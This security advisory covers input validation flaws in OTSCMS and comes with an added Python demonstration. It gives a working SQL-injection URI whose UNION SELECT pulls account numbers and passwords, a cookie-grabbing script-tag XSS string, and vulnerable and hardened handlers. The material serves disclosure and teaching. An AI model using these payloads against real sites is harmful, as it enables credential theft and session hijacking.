OTSCMS Multiple Input Validation Vulnerabilities

To exploit a cross-site scripting issue, an attacker can entice an unsuspecting user into following a malicious URI; the injected script then runs in that user's browser in the security context of the vulnerable site.

To exploit an SQL-injection issue, an attacker needs only a web client (a browser or a command-line HTTP tool) to submit a crafted request; no interaction by another user is required.

The following proof-of-concept URIs are available:

http://www.example.com/forum.php?module=User&command=profile&name=[xss]

http://www.example.com/priv.php?command=reply&id=-1%20UNION%20SELECT%20accno,null,password%20FROM%20accounts
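The following is an added illustration, not code from the advisory or from OTSCMS. It models the two endpoints named in the PoC URIs as hypothetical Python handlers backed by an in-memory SQLite database: a constructed `accounts`/`priv` schema (an assumption; the real OTSCMS tables are not shown, only the column names `accno` and `password` and the three-column shape of the UNION payload come from the PoC), a string-concatenating `reply` handler that the UNION payload turns into a credential dump, an `id` handler that validates and binds the parameter, and a `profile` handler shown both reflecting `name` raw and HTML-escaping it.

```python
import html
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

# The two proof-of-concept URIs from the advisory.
XSS_URI = "http://www.example.com/forum.php?module=User&command=profile&name=[xss]"
SQLI_URI = ("http://www.example.com/priv.php?command=reply"
            "&id=-1%20UNION%20SELECT%20accno,null,password%20FROM%20accounts")

# Constructed stand-in schema (assumption: OTSCMS's real schema is not on the
# page). accno/password and the three-column message row are taken from the
# shape of the UNION payload; table names, logins and passwords are made up.
SCHEMA = """
CREATE TABLE accounts (accno INTEGER PRIMARY KEY, login TEXT, password TEXT);
CREATE TABLE priv (id INTEGER PRIMARY KEY, subject TEXT, body TEXT);
INSERT INTO accounts VALUES (1, 'admin', 'hunter2');
INSERT INTO accounts VALUES (2, 'alice', 'correct-horse');
INSERT INTO priv VALUES (7, 'hello', 'see you at five');
"""


def open_db():
    """Fresh in-memory database populated with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def query_param(uri, name):
    """Decoded value of one query-string parameter (%20 becomes a space)."""
    return parse_qs(urlsplit(uri).query)[name][0]


def reply_vulnerable(conn, id_param):
    """Hypothetical priv.php?command=reply&id=... handler: the raw parameter is
    spliced into the statement, so 'UNION SELECT ...' is parsed as SQL and the
    accounts table is appended to the result set."""
    sql = "SELECT id, subject, body FROM priv WHERE id=" + id_param
    return conn.execute(sql).fetchall()


def is_valid_id(id_param):
    """Message ids are integers; anything else is rejected before any SQL runs."""
    return re.fullmatch(r"-?\d+", id_param) is not None


def reply_fixed(conn, id_param):
    """Hardened form: type-check, then bind the value as a parameter so the
    database never parses attacker text as SQL."""
    if not is_valid_id(id_param):
        raise ValueError("id must be an integer")
    return conn.execute(
        "SELECT id, subject, body FROM priv WHERE id=?", (int(id_param),)
    ).fetchall()


def profile_vulnerable(name):
    """Hypothetical forum.php?...&name=... handler reflecting the value verbatim."""
    return "<h1>Profile of " + name + "</h1>"


def profile_fixed(name):
    """Hardened form: HTML-escape user input before it reaches the page body."""
    return "<h1>Profile of " + html.escape(name, quote=True) + "</h1>"


if __name__ == "__main__":
    db = open_db()
    payload = query_param(SQLI_URI, "id")
    print("injected statement:", "SELECT id, subject, body FROM priv WHERE id=" + payload)
    for row in reply_vulnerable(db, payload):
        print("leaked:", row)
    print("fixed handler accepts payload?", is_valid_id(payload))
    xss = "<script>alert(document.cookie)</script>"  # stands in for [xss]
    print(profile_vulnerable(xss))
    print(profile_fixed(xss))
```

Running the script prints the two `accounts` rows (account number, NULL, password) from the vulnerable handler, because `id=-1` matches no message and the UNION supplies three columns that line up with `id, subject, body`. The hardened handler rejects the same value before any query is built; the escaped profile page renders the script tag as text instead of executing it.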

Copyright 2010, SecurityFocus